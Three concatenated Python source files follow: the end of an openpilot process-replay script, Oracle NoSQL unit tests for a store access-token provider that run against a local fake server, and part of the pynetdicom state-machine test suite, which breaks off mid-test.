ignore=[("logMonoTime", 0), ("valid", True), ("radarState.cumLagMs", 0)],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("plan.processingDelay", 0)],
init_callback=get_car_params,
should_recv_callback=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"cameraOdometry": ["liveCalibration"]
},
ignore=[("logMonoTime", 0), ("valid", True)],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
),
#ProcessConfig(
# proc_name="dmonitoringd",
# pub_sub={
# "driverState": ["dMonitoringState"],
# "liveCalibration": [], "carState": [], "model": [], "gpsLocation": [],
# },
# ignore=[("logMonoTime", 0), ("valid", True)],
# init_callback=get_car_params,
# should_recv_callback=None,
#),
]
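# Illustrative only: in each pub_sub mapping above, the keys are the message types the
# replay feeds to the process and the values are the messages it is expected to publish
# in response (subject to the per-service frequency check in replay_process below).
# Keys with empty lists ("thermal", "health", ...) are inputs only. So for the controlsd
# config, replaying a "can" message can trigger receipt of controlsState, carState,
# carControl, sendcan, carEvents and carParams.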
def replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
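# Illustrative usage sketch (assumes a LogReader-style iterable of capnp log messages;
# the import path below is a guess and not part of this script):
#
#   if __name__ == "__main__":
#       from tools.lib.logreader import LogReader  # assumed helper
#       lr = list(LogReader(sys.argv[1]))
#       for cfg in CONFIGS:
#           log_msgs = replay_process(cfg, lr)
#           print(cfg.proc_name, len(log_msgs), "messages produced")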
|
store_at_provider.py
|
#
# Copyright (c) 2018, 2021 Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Universal Permissive License v 1.0 as shown at
# https://oss.oracle.com/licenses/upl/
#
import unittest
from requests import codes
from socket import error
from threading import Thread
from time import sleep, time
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from borneo import IllegalArgumentException
from borneo.kv import StoreAccessTokenProvider
class TestStoreAccessTokenProvider(unittest.TestCase):
@classmethod
def setUpClass(cls):
global LOGIN_PATH, LOGOUT_PATH, RENEW_PATH
LOGIN_PATH = '/V2/nosql/security/login'
LOGOUT_PATH = '/V2/nosql/security/logout'
RENEW_PATH = '/V2/nosql/security/renew'
# BASIC_AUTH_STRING matches user name 'test' and password 'NoSql00__123456'
global USER_NAME, PASSWORD, BASIC_AUTH_STRING
USER_NAME = 'test'
PASSWORD = 'NoSql00__123456'
BASIC_AUTH_STRING = 'Basic dGVzdDpOb1NxbDAwX18xMjM0NTY='
global AUTH_TOKEN_PREFIX, LOGIN_TOKEN, RENEW_TOKEN
AUTH_TOKEN_PREFIX = 'Bearer '
LOGIN_TOKEN = 'LOGIN_TOKEN'
RENEW_TOKEN = 'RENEW_TOKEN'
global PORT
PORT = cls._find_port_start_server(TokenHandler)
@classmethod
def tearDownClass(cls):
if cls.httpd is not None:
cls.httpd.shutdown()
cls.httpd.server_close()
cls.httpd = None
def setUp(self):
self.base = 'https://localhost:' + str(PORT)
self.token_provider = None
def tearDown(self):
if self.token_provider is not None:
self.token_provider.close()
self.token_provider = None
def testAccessTokenProviderIllegalInit(self):
# illegal user name
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
{'user_name': USER_NAME}, PASSWORD)
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
'', PASSWORD)
# illegal password
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
USER_NAME, {'password': PASSWORD})
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
USER_NAME, '')
# one of the required parameters is None
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
None, PASSWORD)
def testAccessTokenProviderSetIllegalAutoRenew(self):
self.token_provider = StoreAccessTokenProvider()
self.assertRaises(IllegalArgumentException,
self.token_provider.set_auto_renew, 'IllegalRenew')
def testAccessTokenProviderSetIllegalEndpoint(self):
self.token_provider = StoreAccessTokenProvider(USER_NAME, PASSWORD)
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, None)
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint,
{'endpoint': self.base})
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint,
'localhost:notanint')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, 'localhost:-1')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, 'localhost:8080')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, 'ttp://localhost')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, 'http://localhost')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint,
'localhost:8080:foo')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint,
'https://localhost:-1:x')
def testAccessTokenProviderSetIllegalLogger(self):
self.token_provider = StoreAccessTokenProvider()
self.assertRaises(IllegalArgumentException,
self.token_provider.set_logger, 'IllegalLogger')
def testAccessTokenProviderGetAuthorizationStringWithIllegalRequest(self):
self.token_provider = StoreAccessTokenProvider()
self.assertRaises(IllegalArgumentException,
self.token_provider.get_authorization_string,
'IllegalRequest')
def testAccessTokenProviderGets(self):
base = 'https://localhost:80'
self.token_provider = StoreAccessTokenProvider(
USER_NAME, PASSWORD).set_auto_renew(False).set_endpoint(base)
self.assertTrue(self.token_provider.is_secure())
self.assertFalse(self.token_provider.is_auto_renew())
self.assertEqual(self.token_provider.get_endpoint(), base)
self.assertIsNone(self.token_provider.get_logger())
def testAccessTokenProviderGetAuthorizationString(self):
self.token_provider = StoreAccessTokenProvider(USER_NAME, PASSWORD)
self.token_provider.set_endpoint(self.base)
self.token_provider.set_url_for_test()
# get authorization string.
result = self.token_provider.get_authorization_string()
self.assertIsNotNone(result)
self.assertTrue(result.startswith(AUTH_TOKEN_PREFIX))
self.assertEqual(result[len(AUTH_TOKEN_PREFIX):], LOGIN_TOKEN)
# Wait for the refresh to complete
sleep(10)
result = self.token_provider.get_authorization_string()
self.assertEqual(result[len(AUTH_TOKEN_PREFIX):], RENEW_TOKEN)
self.token_provider.close()
self.assertIsNone(self.token_provider.get_authorization_string())
def testAccessTokenProviderMultiThreads(self):
self.token_provider = StoreAccessTokenProvider(USER_NAME, PASSWORD)
self.token_provider.set_endpoint(self.base)
self.token_provider.set_url_for_test()
threads = list()
for i in range(5):
t = Thread(target=self._run)
t.start()
threads.append(t)
for t in threads:
t.join()
@classmethod
def _find_port_start_server(cls, token_handler):
port = 9000
while True:
try:
cls.httpd = TCPServer(('', port), token_handler)
except error:
port += 1
else:
break
thread = Thread(target=cls.httpd.serve_forever)
thread.daemon = True
thread.start()
return port
def _run(self):
try:
for i in range(5):
self.token_provider.bootstrap_login()
finally:
self.token_provider.close()
class TokenHandler(SimpleHTTPRequestHandler, object):
def do_GET(self):
rawpath = self.path.split('?')[0]
auth_string = self.headers['Authorization']
if rawpath == LOGIN_PATH:
assert auth_string == BASIC_AUTH_STRING
self._generate_login_token(LOGIN_TOKEN)
elif rawpath == RENEW_PATH:
assert auth_string.startswith(AUTH_TOKEN_PREFIX)
self._generate_login_token(RENEW_TOKEN)
elif rawpath == LOGOUT_PATH:
assert auth_string.startswith(AUTH_TOKEN_PREFIX)
self.send_response(codes.ok)
def log_request(self, code='-', size='-'):
pass
def _generate_login_token(self, token_text):
expire_time = int(round(time() * 1000)) + 15000
content = ('{"token": "' + token_text + '", "expireAt": ' +
str(expire_time) + '}')
self.send_response(codes.ok)
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content.encode())
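# Illustrative only: the fake server above answers login/renew requests with a body like
#
#   {"token": "LOGIN_TOKEN", "expireAt": 1700000015000}
#
# where expireAt is a millisecond epoch roughly 15 seconds ahead, which is what lets
# testAccessTokenProviderGetAuthorizationString observe RENEW_TOKEN after its 10 s sleep.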
if __name__ == '__main__':
unittest.main()
|
test_fsm.py
|
"""Unit tests for fsm.py"""
import datetime
import logging
import select
import socket
from struct import pack
import sys
import threading
import time
import pytest
from pynetdicom import AE, build_context, evt, debug_logger
from pynetdicom.association import Association
from pynetdicom import fsm as FINITE_STATE
from pynetdicom.fsm import *
from pynetdicom.dimse_primitives import C_ECHO
from pynetdicom.pdu_primitives import (
A_ASSOCIATE, A_ABORT, A_P_ABORT, P_DATA, A_RELEASE,
MaximumLengthNotification, ImplementationClassUIDNotification
)
from pynetdicom.pdu import A_RELEASE_RQ
from pynetdicom.sop_class import VerificationSOPClass
from pynetdicom.transport import AssociationSocket
from pynetdicom.utils import validate_ae_title
from .dummy_c_scp import DummyVerificationSCP, DummyBaseSCP
from .encoded_pdu_items import (
a_associate_ac, a_associate_rq, a_associate_rj, p_data_tf, a_abort,
a_release_rq, a_release_rp,
)
from .parrot import ThreadedParrot
#debug_logger()
REFERENCE_BAD_EVENTS = [
# Event, bad states
("Evt1", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rq) p
("Evt2", [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection available
("Evt3", [1, 4]), # A-ASSOCIATE-AC PDU recv
("Evt4", [1, 4]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection open
("Evt6", [1, 4]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (ac) p
("Evt8", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rj) p
("Evt9", [1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13]), # P-DATA primitive
("Evt10", [1, 4]), # P-DATA-TF PDU
("Evt11", [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE (rq) p
("Evt12", [1, 4]), # A-RELEASE-RQ PDU recv
("Evt13", [1, 4]), # A-RELEASE-RP PDU recv
("Evt14", [1, 2, 3, 4, 5, 6, 7, 10, 11, 13]), # A-RELEASE (rsp) primitive
("Evt15", [1, 2, 13]), # A-ABORT (rq) primitive
("Evt16", [1, 4]), # A-ABORT PDU recv
("Evt17", [1]), # Connection closed
("Evt18", [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # ARTIM expired
("Evt19", [1, 4]), # Unrecognised PDU rev
]
REFERENCE_GOOD_EVENTS = [
# Event, good states
("Evt1", [1]), # A-ASSOCIATE (rq) p
("Evt2", [4]), # Connection available
("Evt3", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-AC PDU recv
("Evt4", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [1]), # Connection open
("Evt6", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [3]), # A-ASSOCIATE (ac) p
("Evt8", [3]), # A-ASSOCIATE (rj) p
("Evt9", [6, 8]), # P-DATA primitive
("Evt10", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # P-DATA-TF PDU
("Evt11", [6]), # A-RELEASE (rq) p
("Evt12", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RQ PDU recv
("Evt13", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RP PDU recv
("Evt14", [8, 9, 12]), # A-RELEASE (rsp) primitive
("Evt15", [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # A-ABORT (rq) primitive
("Evt16", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ABORT PDU recv
("Evt17", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection closed
("Evt18", [2, 13]), # ARTIM expired
("Evt19", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Unrecognised PDU rev
]
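# Illustrative only: the two tables are intended to partition the 13 states for every
# event, so a quick sanity check (not run as part of the suite) would be:
#
#   for (evt, bad), (evt2, good) in zip(REFERENCE_BAD_EVENTS, REFERENCE_GOOD_EVENTS):
#       assert evt == evt2 and sorted(bad + good) == list(range(1, 14))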
class BadDUL(object):
"""A DUL that always raises an exception during actions."""
def __init__(self):
self.is_killed = False
def kill_dul(self):
"""Hook for testing whether DUL got killed."""
self.is_killed = True
@property
def primitive(self):
"""Prevent StateMachine from setting primitive."""
return None
class TestStateMachine(object):
"""Non-functional unit tests for fsm.StateMachine."""
def test_init(self):
"""Test creation of new StateMachine."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
assert fsm.current_state == 'Sta1'
assert fsm.dul == assoc.dul
def test_invalid_transition_raises(self):
"""Test StateMachine.transition using invalid states raises."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
msg = r"Invalid state 'Sta0' for State Machine"
with pytest.raises(ValueError, match=msg):
fsm.transition('Sta0')
def test_valid_transition(self):
"""Test StateMachine.transition using valid states."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for ii in range(1, 14):
assert 1 <= ii <= 13
fsm.transition("Sta{}".format(ii))
assert fsm.current_state == "Sta{}".format(ii)
@pytest.mark.parametrize("event, states", REFERENCE_BAD_EVENTS)
def test_invalid_action_raises(self, event, states):
"""Test StateMachine.do_action raises exception if action invalid."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for state in states:
state = "Sta{}".format(state)
fsm.current_state = state
msg = (
r"Invalid event '{}' for the current state '{}'"
.format(event, state)
)
with pytest.raises(InvalidEventError, match=msg):
fsm.do_action(event)
@pytest.mark.parametrize("event, states", REFERENCE_GOOD_EVENTS)
def test_exception_during_action(self, event, states):
"""Test an exception raised during an action kill the DUL."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
fsm.dul = BadDUL()
for state in states:
fsm.dul.is_killed = False
state = "Sta{}".format(state)
fsm.current_state = state
with pytest.raises(AttributeError):
fsm.do_action(event)
assert fsm.dul.is_killed is True
assert fsm.current_state == state
class TestStateBase(object):
"""Base class for State tests."""
def setup(self):
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
for thread in threading.enumerate():
if isinstance(thread, ThreadedParrot):
thread.shutdown()
def get_associate(self, assoc_type):
primitive = A_ASSOCIATE()
if assoc_type == 'request':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.calling_presentation_address = ('', 0)
# The TCP/IP address of the destination, pynetdicom includes port too
primitive.called_presentation_address = ('localhost', 11112)
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16382
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'accept':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# Result of the association request: 0x00 = accepted (source 0x01 = UL service-user)
primitive.result = 0x00
primitive.result_source = 0x01
# Accepted presentation contexts (results)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_results_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16383
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4.5'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'reject':
primitive.result = 0x01
primitive.result_source = 0x01
primitive.diagnostic = 0x01
return primitive
def get_release(self, is_response=False):
primitive = A_RELEASE()
if is_response:
primitive.result = 'affirmative'
return primitive
def get_abort(self, is_ap=False):
if is_ap:
primitive = A_P_ABORT()
primitive.provider_reason = 0x00
else:
primitive = A_ABORT()
primitive.abort_source = 0x00
return primitive
def get_pdata(self):
item = [1, p_data_tf[10:]]
primitive = P_DATA()
primitive.presentation_data_value_list.append(item)
return primitive
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm._events = []
fsm.original_action = fsm.do_action
def do_action(event):
fsm._events.append(event)
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(('', 11112), commands)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def print_fsm_scp(self, fsm, scp=None):
"""Print out some of the quantities we're interested in."""
print('Transitions', fsm._transitions)
print('Changes')
for change in fsm._changes:
print('\t{}'.format(change))
print('Events', fsm._events)
if scp and scp.handlers:
print('Received', scp.handlers[0].received)
print('Sent', scp.handlers[0].sent)
def get_acceptor_assoc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_RCVTIMEO,
pack('ll', 1, 0)
)
sock.connect(('', 11112))
ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='acceptor')
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
fsm = self.monkey_patch(assoc.dul.state_machine)
return assoc, fsm
class TestState01(TestStateBase):
"""Tests for State 01: Idle."""
def test_evt01(self):
"""Test Sta1 + Evt1."""
# Sta1 + Evt1 -> AE-1 -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
# AE-1: Issue TRANSPORT_CONNECT primitive to <transport service>
commands = [
('recv', None),
('send', a_abort)
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:1] == ['Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta1 + Evt2."""
# Sta1 + Evt2 -> <ignore> -> Sta1
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta1 + Evt3."""
# Sta1 + Evt3 -> <ignore> -> Sta1
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt3']
def test_evt04(self):
"""Test Sta1 + Evt4."""
# Sta1 + Evt4 -> <ignore> -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta1 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta1 + Evt6."""
# Sta1 + Evt6 -> <ignore> -> Sta1
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt6']
def test_evt07(self):
"""Test Sta1 + Evt7."""
# Sta1 + Evt7 -> <ignore> -> Sta1
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt7'
def test_evt08(self):
"""Test Sta1 + Evt8."""
# Sta1 + Evt8 -> <ignore> -> Sta1
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt8'
assert self.fsm.current_state == 'Sta1'
def test_evt09(self):
"""Test Sta1 + Evt9."""
# Sta1 + Evt9 -> <ignore> -> Sta1
# Evt9: Receive P-DATA primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt9'
assert self.fsm.current_state == 'Sta1'
def test_evt10(self):
"""Test Sta1 + Evt10."""
# Sta1 + Evt10 -> <ignore> -> Sta1
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt10']
def test_evt11(self):
"""Test Sta1 + Evt11."""
# Sta1 + Evt11 -> <ignore> -> Sta1
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt11'
assert self.fsm.current_state == 'Sta1'
def test_evt12(self):
"""Test Sta1 + Evt12."""
# Sta1 + Evt12 -> <ignore> -> Sta1
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt12']
def test_evt13(self):
"""Test Sta1 + Evt13."""
# Sta1 + Evt13 -> <ignore> -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt13']
def test_evt14(self):
"""Test Sta1 + Evt14."""
# Sta1 + Evt14 -> <ignore> -> Sta1
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt14'
assert self.fsm.current_state == 'Sta1'
def test_evt15(self):
"""Test Sta1 + Evt15."""
# Sta1 + Evt15 -> <ignore> -> Sta1
# Evt15: Receive A-ABORT (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_abort(False))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt15'
assert self.fsm.current_state == 'Sta1'
def test_evt16(self):
"""Test Sta1 + Evt16."""
# Sta1 + Evt16 -> <ignore> -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt16']
def test_evt17(self):
"""Test Sta1 + Evt17."""
# Sta1 + Evt17 -> <ignore> -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = []
scp = self.start_server(commands)
